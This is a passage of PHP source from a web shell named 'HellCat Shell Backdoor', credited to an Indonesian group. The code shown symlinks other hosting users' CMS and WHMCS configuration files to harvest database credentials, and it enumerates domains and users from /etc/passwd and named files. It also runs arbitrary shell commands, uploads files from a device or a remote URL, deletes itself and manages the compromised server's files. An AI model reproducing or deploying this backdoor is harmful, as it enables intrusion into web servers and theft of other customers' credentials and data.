  1506. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/inc/config.php',"hellcat/".$ms_1[0].'-MyBB.txt');
  1507. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/Settings.php',"hellcat/".$ms_1[0].'-SMF.txt');
  1508. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/sites/default/settings.php',"hellcat/".$ms_1[0].'-Drupal.txt');
  1509. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/e107_config.php',"hellcat/".$ms_1[0].'-e107.txt');
  1510. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/datas/config.php',"hellcat/".$ms_1[0].'-Seditio.txt');
  1511. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/includes/configure.php',"hellcat/".$ms_1[0].'-osCommerce.txt');
  1512. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/client/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
  1513. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/clientes/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
  1514. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/support/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
  1515. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/supportes/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
  1516. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/whmcs/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
  1517. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/domain/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
  1518. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/hosting/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
  1519. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/whmc/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
  1520. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/billing/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
  1521. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/portal/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
  1522. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/order/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
  1523. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/clientarea/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
  1524. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/domains/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt'); }
  1525. }
  1526.  
  1527. elseif(isset($_REQUEST['symlink'])){
  1528. switch ($_REQUEST['symlink']){
  1529. case 'var':
  1530. if(is_readable("/var/named")){
  1531. echo '<div class="coL-panel"><table>
  1532. <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">SYMLINK [ VAR/NAMED ]</td></table></div>';
  1533. echo '<table class="table-info">';
  1534. echo '
  1535. <th class="th-info">Website</th>
  1536. <th class="th-info" style="width:60px">User</th>
  1537. <th class="th-info" style="width:40px">Action</th>';
  1538. $ms_5 = scandir("/var/named");
  1539. foreach($ms_5 as $ms_6){
  1540. if(strpos($ms_6,".db")){
  1541. $i += 1;
  1542. $ms_6 = str_replace('.db','',$ms_6);
  1543. $owner = posix_getpwuid(fileowner("/etc/valiases/".$ms_6));
  1544.  
  1545. echo "<tr class='ex-hov'>
  1546. <td class='td-info break'> <span class='label-default'>+</span>  <a href='http://".$ms_6." '>".$ms_6."</a></td>
  1547. <td class='td-info'><center><font color='#1D9D73'>".$owner['name']."</font></center></td>
  1548. <td class='td-info'><center><a href='hellcat/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a></center></td>";
  1549.   }
  1550. }
  1551. echo "</table><div class='coL-option' style='padding:7px;margin-top:3px'>
  1552. Total Domain : <font color='#1D9D73'>".$i."</font> </div>";
  1553. }else{ echo "<tr><td class='td-info'>can't read [ /var/named ]</td></table>";
  1554.     }
  1555. break;
  1556. }
  1557.  
  1558. switch ($_REQUEST['symlink']){
  1559. case 'passwd':
  1560. error_reporting(0);
  1561. $etc = file_get_contents("/etc/passwd");
  1562. $etcz = explode("\n",$etc);
  1563. if(is_readable("/etc/passwd")){
  1564. echo '<div class="coL-panel"><table>
  1565. <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">SYMLINK [ ETC/PASSWD ]</td></table></div>';
  1566. echo '<table class="table-info">';
  1567. echo '
  1568. <th class="th-info">Website</th>
  1569. <th class="th-info" style="width:60px">User</th>
  1570. <th class="th-info" style="width:40px">Action</th>';
  1571. $list = scandir("/var/named");
  1572. foreach($etcz as $etz){
  1573. $etcc = explode(":",$etz);
  1574. foreach($list as $domain){
  1575. if(strpos($domain,".db")){
  1576. $domain = str_replace('.db','',$domain);
  1577. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1578. if($owner['name'] == $etcc[0]) {
  1579. $i += 1;
  1580. echo "<tr class='ex-hov'><td class='td-info break'> <span class='label-default'>+</span>  <a href='http://".$domain." '>".$domain."</a></td>
  1581. <td class='td-info'><center><font color='#1D9D73'>".$owner['name']."</font></center></td>
  1582. <td class='td-info'><center><a href='hellcat/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a></center></td>";
  1583. }}}}
  1584. echo "</table><div class='coL-option' style='padding:7px;margin-top:3px'>
  1585. Total Domain : <font color='#1D9D73'>".$i."</font> </div>";}
  1586. break;
  1587.     }
  1588.  
  1589. switch ($_REQUEST['symlink']){
  1590. case 'named.conf':
  1591. if(is_readable("/etc/named.conf")){
  1592. echo '<div class="coL-panel"><table>
  1593. <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">SYMLINK [ ETC/NAMED.CONF ]</td></table></div>';
  1594. echo '<table class="table-info">';
  1595. echo '
  1596. <th class="th-info">Website</th>
  1597. <th class="th-info" style="width:60px">User</th>
  1598. <th class="th-info" style="width:40px">Action</th>';
  1599. $named = file_get_contents("/etc/named.conf");
  1600. preg_match_all('%zone \"(.*)\" {%',$named,$domains);
  1601. foreach($domains[1] as $domain){
  1602. $domain = trim($domain);
  1603. $i += 1;
  1604. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1605. echo "<tr class='ex-hov'><td class='td-info break'> <span class='label-default'>+</span>  <a href='http://".$domain." '>".$domain."</a></td><td class='td-info'><center><font color='#1D9D73'>".$owner['name']."</font></center></td><td class='td-info'><center><a href='hellcat/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a></center></td>";
  1606. }
  1607. echo "</table><div class='coL-option' style='padding:7px;margin-top:3px'>
  1608. Total Domain : <font color='#1D9D73'>".$i."</font> </div>";
  1609. } else { echo "<tr><td class='td-info'>can't read [ /etc/named.conf ]</td></tr>"; }
  1610. break;
  1611. }
  1612. switch ($_REQUEST['symlink']){
  1613. case 'valiases':
  1614. if(is_readable("/etc/valiases")){
  1615. echo '<div class="coL-panel"><table>
  1616. <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">SYMLINK [ ETC/VALIASES ]</td></table></div>';
  1617. echo '<table class="table-info">';
  1618. echo '
  1619. <th class="th-info">Website</th>
  1620. <th class="th-info" style="width:60px">User</th>
  1621. <th class="th-info" style="width:40px">Action</th>';
  1622. $list = scandir("/etc/valiases");
  1623. foreach($list as $domain){
  1624. $i += 1;
  1625. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1626. echo "<tr class='ex-hov'><td class='td-info break'> <span class='label-default'>+</span> <a href='http://".$domain."'>".$domain."</a></td><center><td class='td-info'><font color='#1D9D73'>".$owner['name']."</font></center></td><td class='td-info'><center><a href='hellcat/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a></center></td>";
  1627. }
  1628. echo "</table><div class='coL-option' style='padding:7px;margin-top:3px'>
  1629. Total Domain : <font color='#1D9D73'>".$i."</font></div>";
  1630. } else { echo "<tr><td class='td-info'>can't read [ /etc/valiases ]</td></tr>"; }
  1631. break;
  1632.     }
  1633. }
  1634.  
  1635. elseif($_COEG['command'] == 'change') {
  1636. vars('<style> .tup { font-size: 14px; } </style>');
  1637. vars('<div class="coL-panel"><table>
  1638. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">CHANGE PASSWORD</td></table></div>');
  1639. vars('<script>
  1640. function validate(){
  1641.             var a = document.getElementById("newpass").value;
  1642.            var b = document.getElementById("confirm").value;
  1643.            if (a!=b) {');
  1644.       s('Password Do Not Match !!');
  1645.             vars('return false;
  1646.     }
  1647. }
  1648.     </script>');
  1649. function xs($file){
  1650.     return file_get_contents($file);
  1651. }
  1652. function chipt($plain){
  1653.         return md5($plain);
  1654. }
  1655. function changepass($plain){
  1656.     $npass = chipt($plain);
  1657.     $npass = "\$pass = \"".$npass."\";";
  1658.     $con = xs($_SERVER['SCRIPT_FILENAME']);
  1659.     $con = preg_replace("/\\\$pass\ *=\ *[\"\']*([a-fA-F0-9]*)[\"\']*;/is",$npass,$con);
  1660.     return file_put_contents($_SERVER['SCRIPT_FILENAME'], $con);
  1661. }
  1662.  
  1663. if($_COEG['newpass']) {
  1664. if(changepass($_COEG['newpass'])) {
  1665. success('Password Changed !!');
  1666. mtr('?'.x5.$dir.'&'.x7.'logout');
  1667. } else {
  1668. error('Unable To Change Password !!');
  1669.     }
  1670. }
  1671. echo "<div class='coL-option top'>
  1672. <form method='post' onSubmit='return validate();' action='?".x7."change&".x5.$dir."'><table style='width:100%'>
  1673. <td class='tup' style='width:120px'>Password :</td><td style='width:75%'><input type='password' id='newpass' name='newpass' style='width:100%'></td>
  1674. <tr>
  1675. <td class='tup' style='width:120px'>Confirm :</td><td style='width:75%'><input type='password' id='confirm' name='confirm' style='width:100%'></td>
  1676. <tr>
  1677. <td style='width:120px'></td><td style='width:75%'>
  1678. <button onmousedown='bleep.play();'
  1679. type='submit' name='cps' class='btn-exe' onclick='saveForm();return false;' style='width:100px'><i class='fa fa-arrow-circle-right'></i></button></td></table></form></div>";
  1680. echo '<script>function saveForm(){
  1681. if(document.getElementById("newpass").value == ""){';
  1682.        s('Enter New Password !!');
  1683.    echo'document.getElementById("newpass").focus();
  1684.      return false;
  1685.    }
  1686. if(document.getElementById("confirm").value == ""){';
  1687.       s('Confirm Your Password !!');
  1688.    echo'return false;
  1689.    }
  1690.    document.getElementById("sks").submit();
  1691.  }
  1692. </script>';
  1693. }
  1694. elseif($_COEG['command'] == 'kill') {
  1695. if(file_exists("hellcat_shell.php"))
  1696. unlink("hellcat_shell.php");unlink(__FILE__);
  1697.     success('bye!');
  1698.     mtr('https://www.hellcatindonesia.net/');
  1699. }
  1700. elseif($_COEG['command'] == 'renadir') {
  1701.    $c = $_COEG['e'];
  1702.     if($_COEG['e']) {
  1703.         $e = rename($dir, "".dirname($dir)."/".htmlspecialchars($_COEG['e'])."");
  1704.         if($e) {
  1705. vars('<script>c("?'.x5.dirname($dir).'");</script>');
  1706.     } else {
  1707. error('Permission Denied !!');
  1708.     }
  1709. }
  1710. vars('<div class="coL-panel"><table>
  1711. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">RENAME DIRECTORY</td></table></div>');
  1712. vars("<div class='coL-option top'>
  1713. <br><br><br>
  1714.     <center>
  1715.         <i class='fa fa-folder-o fa-3x'></i></center><br><br>");
  1716. vars("<form action='?".x7."renadir&".x5.$dir."' style='margin:0px' method='post'>
  1717. <table cellspacing='0'>
  1718.     <td align='center' style='width:10%'><i class='fa fa-folder-o'></i> </td><td style='width:70%'><input type='text' value='".basename($dir)."' name='e'></td><td style='width:20%'>
  1719.     <button onmousedown='bleep.play();'
  1720. type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
  1721.     </form></div>");
  1722. }
  1723. elseif($_COEG['command'] == 'deledir') {
  1724. $x0z1 = deledir($dir);
  1725.  if($x0z1) {
  1726.         vars("<script>window.location = '?".x5.dirname($dir)."';</script>");
  1727.     } else {
  1728.         vars("<script>window.location = '?".x5.dirname($dir)."';</script>");
  1729.         error('Permission Denied !!');
  1730.     }
  1731. }
  1732. elseif($_COEG['command'] == 'about') {
  1733.   echo '<div class="coL-panel"><table>
  1734. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">ABOUT ME</td></table></div>';
  1735. echo '<div class="coL-option" style="padding:7px"><br><br>
  1736.     <center><i class="fa fa-group fa-4x"></i></center><br>
  1737. <center><font size="4px" style="shadow:2px 2px 0px #fff">HELLCAT INDONESIA</font></font><br><i class="fa fa-globe"></i>&nbsp; http://'.$_SERVER['HTTP_HOST'].'</center><br><br>
  1738. </div>
  1739.  
  1740. <div class="coL-panel top"><table>
  1741. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">ABOUT</td></table></div>
  1742. <table class="table-info">
  1743. <tr class="ex-hov">
  1744. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Name</td> <td class="td-info">: HellCat Shell Backdoor</td>
  1745. <tr class="ex-hov">
  1746. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Version</td> <td class="td-info">: 1.3 ( <font color="green">Premium Script</font> )</td>
  1747. <tr class="ex-hov">
  1748. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Author</td> <td class="td-info">: Bartes Dwiky</td>
  1749. <tr class="ex-hov">
  1750. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Email</td> <td class="td-info break">: <a class="a" href="mailto:hellcatindonesia@gmail.com">hellcatindonesia@gmail.com</a></td>
  1751. <tr class="ex-hov">
  1752. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Instagram</td> <td class="td-info break">:  <a class="a" href="https://www.instagram.com/hellcatindonesia">http://instagram.com/hellcatindonesia</a></td>
  1753. <tr class="ex-hov">
  1754. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Blog</td> <td class="td-info">: <a class="a" href="https://www.hellcatindonesia.net">http://hellcatindonesia.net/</a></td></table>
  1755. <div class="coL-option">
  1756. <center><br>Jika ada kesalahan atau ada bug pada shell backdoor kami, Silahkan contact email kami di atas.<br><br><center><br>&mdash; Thanks All &mdash;</center></div>';
  1757. }
  1758.  
  1759. elseif($_COEG['command'] == 'upload') {
  1760. vars('<style> .tup { font-size: 14px; } </style>');
  1761. echo '<div class="coL-panel"><table>
  1762. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">MULTIPLE UPLOAD</td></table></div>';
  1763. if(isset($_REQUEST['ufile'])) {
  1764. $ufile = $_COEG['ufile'] ;
  1765. }
  1766. if(isset($_REQUEST['upload'])) {
  1767. if($_COEG['upload']){
  1768. if(empty($ufile)) {
  1769.     $cx = $_FILES['file']['name'];
  1770. } else {
  1771.     $cx = $ufile;
  1772. }
  1773. if(@copy($_FILES['file']['tmp_name'],$dir.'/'.$cx)) {
  1774. success('File Uploaded !!');
  1775. } else {
  1776. error('Upload Failed !!');
  1777.           } } }
  1778. vars('<script language="Javascript">
  1779.         function cogx(){
  1780. if(document.forms[\'upload\'].file.value === "") {');
  1781.     s('Select Your File !!');
  1782.     vars('return false;
  1783.     }
  1784. }
  1785. </script>');
  1786. echo '<div class="coL-option"><span class="label-default">+</span> Upload From Device :<hr>';
  1787. echo '<form enctype="multipart/form-data" name="upload" action="?'.x7.'upload&'.x5.$dir.'"   method="POST" style="margin:0px">
  1788. <table style="width:100%">
  1789. <td class="tup" style="width:20%">File :</td>
  1790. <td style="width:80%">
  1791. <input onmousedown="bleep.play();"
  1792. type="file" name="file"></td>
  1793. <tr>
  1794. <td class="tup" style="width:20%">Name :</td>
  1795. <td style="width:80%"><input name="ufile" type="text" placeholder="( Optional )" value="" /></td>
  1796. <tr>
  1797. <td style="width:20%"></td>
  1798. <td style="width:80%"><input onmousedown="bleep.play();"
  1799. type="submit" name="upload" style="width:100px" onclick="return cogx();" value="Upload" class="btn-exe" />
  1800. </td></table></form></div>';
  1801. if($_COEG["submit"]){
  1802. $url = trim($_COEG["url"]);
  1803. $uname = $_COEG["uname"];
  1804. if(empty($uname)) {
  1805.       $uname = basename($url);
  1806. } else {
  1807.       $uname = $_COEG["uname"];
  1808. }
  1809. if(op($uname, $url)) {
  1810.     success('File Uploaded !!');
  1811. } else {
  1812.     error('Failed !!');
  1813.     }
  1814. }
  1815. vars('<script language="Javascript">
  1816.         function cog(){
  1817. if(document.forms[\'import\'].url.value === "") {');
  1818.     s('Enter URL !!');
  1819.     vars('return false;
  1820.     }
  1821. }
  1822. </script>');
  1823. echo '<div class="coL-option top"><span class="label-default">+</span> Upload From Internet (Import) :<hr>';
  1824. echo '<form name="import" action="?'.x7.'upload&'.x5.$dir.'"  method="POST">';
  1825. echo '<table style="width:100%">
  1826. <td class="tup" style="width:20%">Link :</td>
  1827. <td style="width:80%"><input type="text" name="url" placeholder="https://pastebin.com/raw/M4bJJtBD" style="width:100%"></td>
  1828. <tr>
  1829. <td class="tup" style="width:20%">Name :</td>
  1830. <td style="width:80%"><input type="text" name="uname" style="width:100%" placeholder="( Optional )"></td>
  1831. <tr>
  1832. <td style="width:20%"></td><td style="width:80%"><input type="submit" name="submit" style="width:100px" value="Upload" onclick="return cog();" class="btn-exe"></td></table></form></div>';
  1833. }
  1834. elseif ($_COEG['command'] == 'system') {
  1835. function exe($ms_x) {  
  1836. if(function_exists('system')) {        
  1837.         @ob_start();       
  1838.         @system($ms_x);        
  1839.         $ms_z = @ob_get_contents();        
  1840.         @ob_end_clean();       
  1841.         return $ms_z;  
  1842.     } elseif(function_exists('exec')) {        
  1843.         @exec($ms_x,$values);      
  1844.         $ms_z = "";        
  1845.         foreach($values as $value) {           
  1846.             $ms_z .= $result;      
  1847.         } return $ms_z;    
  1848.     } elseif(function_exists('passthru')) {        
  1849.         @ob_start();       
  1850.         @passthru($ms_x);      
  1851.         $ms_z = @ob_get_contents();        
  1852.         @ob_end_clean();       
  1853.         return $ms_z;  
  1854.     } elseif(function_exists('shell_exec')) {      
  1855.         $ms_z = @shell_exec($ms_x);        
  1856.         return $ms_z;  
  1857.     }
  1858. }
  1859. function disk($dz) {
  1860. if($dz >= 1073741824)
  1861. return sprintf('%1.2f',$dz / 1073741824 ).' GB';
  1862. elseif($dz >= 1048576)
  1863. return sprintf('%1.2f',$dz / 1048576 ) .' MB';
  1864. elseif($dz >= 1024)
  1865. return sprintf('%1.2f',$dz / 1024 ) .' KB';
  1866. else
  1867. return $dz .' B';
  1868. }
  1869. function fuck($b_ms, $c_ms, $d_ms){
  1870.     if(strpos($b_ms, $c_ms) === FALSE) return FALSE;
  1871.     if(strpos($b_ms, $d_ms) === FALSE) return FALSE;
  1872.     $a_ms = strpos($b_ms, $c_ms) + strlen($c_ms);
  1873.     $e_ms = strpos($b_ms, $d_ms, $a_ms);
  1874.     $f_ms = substr($b_ms, $a_ms, $e_ms - $a_ms);
  1875.     return $f_ms; }
  1876. if(get_magic_quotes_gpc()) {
  1877. function m_ms($n_ms) {
  1878. return is_array($n_ms) ? array_map('m_ms', $n_ms) : stripslashes($n_ms); }
  1879. $_COEG = m_ms($_COEG); }
  1880.  
  1881. $safemode = (@ini_get(strtolower("safe_mode")) == 'on') ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
  1882.  
  1883. $disablefunc = @ini_get("disable_functions");
  1884. $mysql = (function_exists('mysql_connect')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
  1885.  
  1886. $curl = (function_exists('curl_version')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</font>";
  1887.  
  1888. $wget = (exe('wget --help')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
  1889.  
  1890. $perl = (exe('perl --help')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</font>";
  1891.  
  1892. $python = (exe('python --help')) ? "
  1893. <span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
  1894.  
  1895. $ds_men = (!empty($disablefunc)) ? "<span class='label-danger'>".$disablefunc."</span>" : "<span class='label-success'>NONE</span>";
  1896. if(!function_exists('posix_getegid')) {
  1897.     $c_us = @get_current_user();
  1898.     $c_id = @getmyuid();
  1899.     $g_c = @getmygid();
  1900.     $gr_p = "?";
  1901. } else {
  1902.     $c_id = @posix_getpwuid(posix_geteuid());
  1903.     $g_c = @posix_getgrgid(posix_getegid());
  1904.     $c_us = $c_id['name'];
  1905.     $c_id = $c_id['uid'];
  1906.     $gr_p = $g_c['name'];
  1907.     $g_c = $g_c['gid'];
  1908. }
  1909. echo '<div class="coL-panel"><table>
  1910. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">SYSTEM INFORMATION</td></table></div>';
  1911. echo "<table width=100% class='table-info' cellspacing=0>
  1912. <th class=th-info style=width:120px><center>Component</center></th>
  1913. <th class=th-info><center>Arrow</center></th>
  1914. <th class=th-info break><center>Result</center></th></tr>";
  1915. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Server </td><td class='td-info' align='center'>&raquo;</td>
  1916. <td class='td-info'> ".$_SERVER['SERVER_SOFTWARE']."</td></tr>";
  1917. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
  1918. Username</td><td class='td-info' align='center'>&raquo;</td>
  1919. <td class='td-info'> ".$c_us." [".$c_id."]</td></tr>";
  1920. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
  1921. Group</td><td class='td-info' align='center'>&raquo;</td>
  1922. <td class='td-info'>".$gr_p." [".$g_c."]</td></tr>";
  1923. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
  1924. Server IP </td><td class='td-info' align='center'>&raquo;</td>
  1925. <td class='td-info'>".gethostbyname($_SERVER['HTTP_HOST'])."</td></tr>";
  1926. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
  1927. Your IP </td><td class='td-info' align='center'>&raquo;</td>
  1928. <td class='td-info'> ".$_SERVER['REMOTE_ADDR']."</td></tr>";
  1929. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
  1930. PHP Version</td><td class='td-info' align='center'>&raquo;</td>
  1931. <td class='td-info'> ".@phpversion()."</td></tr>";
  1932. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Disk Space</td> <td class='td-info' align='center'>&raquo;</td>
  1933. <td class='td-info'>[".disk(disk_free_space("/"))."] / [".disk(disk_total_space("/"))."]</td></tr>";
  1934. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Safe Mode</td><td class='td-info' align='center'>&raquo;</td>
  1935. <td class='td-info'> $safemode</td></tr>";
  1936. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> MySQL</td><td class='td-info' align='center'>&raquo;</td><td class='td-info'>$mysql</td></tr>";
  1937. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
  1938. Perl</td><td class='td-info' align='center'>&raquo;</td>
  1939. <td class='td-info'> $perl </td></tr>";
  1940. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Python</td><td class='td-info' align='center'>&raquo;</td>
  1941. <td class='td-info'>$python</td></tr>";
  1942. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> WGET</td><td class='td-info' align='center'>&raquo;</td>
  1943. <td class='td-info'>$wget</td></tr>";
  1944. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> CURL</td><td class='td-info' align='center'>&raquo;</td><td class='td-info'>$curl</td></tr>";
  1945.  if(get_magic_quotes_gpc() == "1" or get_magic_quotes_gpc() == "on") {
  1946.   echo "<tr class='ex-hov'><td align='left' class='td-info'><span class='label label-default'>+</span> Magic Quotes  </td><td class='td-info' align='center'>&raquo;</td>
  1947. <td><span class='label label-success'>ON</span></tr>"; } else { echo "<tr class='ex-hov'><td align='left' class='td-info'><span class='label label-default'>+</span> Magic Quotes  </td><td class='td-info' align='center'>&raquo;</td><td class='td-info'><span class='label label-danger'>OFF</span></td></tr>"; }
  1948. echo "</table>";  
  1949. echo '<div class="coL-panel top"><table>
  1950. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">KERNEL</td></table></div>';
  1951. echo "<div class ='coL-option' style='margin-bottom:3px;padding:7px'>".php_uname()."</div>";
  1952. echo '<div class="coL-panel top"><table>
  1953. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">DISABLE FUNCTION</td></table></div>';
  1954. echo "<div class='coL-option wrap break' style='padding:7px'>".$ds_men."</div>";
  1955. }
  1956. elseif($_COEG['command'] == 'error') {
  1957. echo '<div class="coL-panel"><table>
  1958. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">FILE MANAGER</td></table></div>';
  1959.     error('Permission Denied !!');
  1960.     echo x9;
  1961. } else {
  1962. $hc = @getcwd();
  1963. if(isset($_COEG['location']))
  1964.     @chdir($_COEG['location']);
  1965. $cwd = @getcwd();
  1966. if($os == 'win') {
  1967.     $hc = str_replace("\\", "/", $hc);
  1968.     $cwd = str_replace("\\", "/", $cwd);
  1969. }
  1970. if($cwd[strlen($cwd)-1] != '/')
  1971.     $cwd .= '/';
  1972.  
  1973. function hs($d) {
  1974.     if(function_exists("scandir")) {
  1975.         return scandir($d);
  1976.     } else {
  1977.         $dh  = opendir($d);
  1978.         while (false !== ($filename = readdir($dh)))
  1979.             $data[] = $filename;
  1980.         return $data;
  1981.     }
  1982. }
  1983.   if(!empty($_COOKIE['msv5']))
  1984.         $_COOKIE['msv5'] = @unserialize($_COOKIE['msv5']);
  1985.      
  1986.     if(!empty($_COEG['hcx'])) {
  1987.         switch($_COEG['hcx']) {
  1988.             case 'mkdir':
  1989.                 if(!@mkdir($_COEG['p2']))
  1990.                     echo "Can't create new dir";
  1991.                 break;
  1992.             case 'delete':
  1993.                 function deleteDir($path) {
  1994.                     $path = (substr($path,-1)=='/') ? $path:$path.'/';
  1995.                     $dh  = opendir($path);
  1996.                     while ( ($â–Ÿ = readdir($dh) ) !== false) {
  1997.                         $â–Ÿ = $path.$â–Ÿ;
  1998.                         if ( (basename($â–Ÿ) == "..") || (basename($â–Ÿ) == ".") )
  1999.                             continue;
  2000.                         $type = filetype($â–Ÿ);
  2001.                         if ($type == "dir")
  2002.                             deleteDir($â–Ÿ);
  2003.                         else
  2004.                             @unlink($â–Ÿ);
  2005.                     }
  2006.                     closedir($dh);
  2007.                     @rmdir($path);
  2008.                 }
  2009.                 if(is_array(@$_COEG['msv5']))
  2010.                     foreach($_COEG['msv5'] as $f) {
  2011.                         if($f == '..')
  2012.                             continue;
  2013.                         $f = urldecode($f);
  2014.                         if(is_dir($f))
  2015.                             deleteDir($f);
  2016.                         else
  2017.                             @unlink($f);
  2018.                     }
  2019.                 break;
  2020.             case 'paste':
  2021.                 if($_COOKIE['act'] == 'copy') {
  2022.                     function copy_paste($c,$s,$d){
  2023.                         if(is_dir($c.$s)){
  2024.                             mkdir($d.$s);
  2025.                             $h = @opendir($c.$s);
  2026.                             while (($f = @readdir($h)) !== false)
  2027.                                 if (($f != ".") and ($f != ".."))
  2028.                                     copy_paste($c.$s.'/',$f, $d.$s.'/');
  2029.                         } elseif(is_file($c.$s))
  2030.                             @copy($c.$s, $d.$s);
  2031.                     }
  2032.                     foreach($_COOKIE['msv5'] as $f)
  2033.                         copy_paste($_COOKIE['location'],$f, $GLOBALS['cwd']);
  2034.                 } elseif($_COOKIE['act'] == 'move') {
  2035.                     function move_paste($c,$s,$d){
  2036.                         if(is_dir($c.$s)){
  2037.                             mkdir($d.$s);
  2038.                             $h = @opendir($c.$s);
  2039.                             while (($f = @readdir($h)) !== false)
  2040.                                 if (($f != ".") and ($f != ".."))
  2041.                                     copy_paste($c.$s.'/',$f, $d.$s.'/');
  2042.                         } elseif(@is_file($c.$s))
  2043.                             @copy($c.$s, $d.$s);
  2044.                     }
  2045.                     foreach($_COOKIE['msv5'] as $f)
  2046.                         @rename($_COOKIE['location'].$f, $GLOBALS['cwd'].$f);
  2047.                 } elseif($_COOKIE['act'] == 'zip') {
  2048.                     if(class_exists('ZipArchive')) {
  2049.                         $zip = new ZipArchive();
  2050.                         if ($zip->open($_COEG['p2'], 1)) {
  2051.                             chdir($_COOKIE['location']);
  2052.                             foreach($_COOKIE['msv5'] as $f) {
  2053.                                 if($f == '..')
  2054.                                     continue;
  2055.                                 if(@is_file($_COOKIE['location'].$f))
  2056.                                     $zip->addFile($_COOKIE['location'].$f, $f);
  2057.                                 elseif(@is_dir($_COOKIE['location'].$f)) {
  2058.                                     $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS));
  2059.                                     foreach ($iterator as $key=>$value) {
  2060.                                         $zip->addFile(realpath($key), $key);
  2061.                                     }
  2062.                                 }
  2063.                             }
  2064.                             chdir($GLOBALS['cwd']);
  2065.                             $zip->close();
  2066.                         }
  2067.                     }
  2068.                 } elseif($_COOKIE['act'] == 'unzip') {
  2069.                     if(class_exists('ZipArchive')) {
  2070.                         $zip = new ZipArchive();
  2071.                         foreach($_COOKIE['msv5'] as $f) {
  2072.                             if($zip->open($_COOKIE['location'].$f)) {
  2073.                                 $zip->extractTo($GLOBALS['cwd']);
  2074.                                 $zip->close();
